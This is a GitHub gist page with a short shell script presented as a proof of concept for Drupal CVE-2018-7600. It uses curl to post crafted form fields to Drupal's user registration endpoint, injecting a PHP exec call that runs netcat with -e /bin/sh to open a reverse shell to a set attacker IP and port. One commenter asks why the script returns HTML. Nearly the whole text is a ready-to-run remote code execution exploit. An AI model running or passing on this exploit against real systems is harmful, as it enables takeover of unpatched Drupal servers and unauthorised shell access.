Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Drupal CVE-2018-7600 PoC - reverse netcat shell ;)
#!/bin/sh
YOUR_EXTERNAL_IP="172.16.30.108"
YOUR_NETCAT_PORT="6969"
# Start up a netcat server
# netcat -l 6969
HOST="http://drupal.docker.localhost:8000"
PHP_FUNCTION="exec"
PHP_ARG="nohup nc $YOUR_EXTERNAL_IP $YOUR_NETCAT_PORT -e /bin/sh"
curl -X POST \
"$HOST/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" \
-F form_id=user_register_form \
-F _drupal_ajax=1 \
-F "mail[#post_render][]=$PHP_FUNCTION" \
-F 'mail[#type]=markup' \
-F "mail[#markup]=$PHP_ARG"
@xuxuedong
Copy link

xuxuedong commented Apr 13, 2018

please, why i was receive some html code, when i execute above shell script? i was using xampp on kali, drupal 8.5.0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment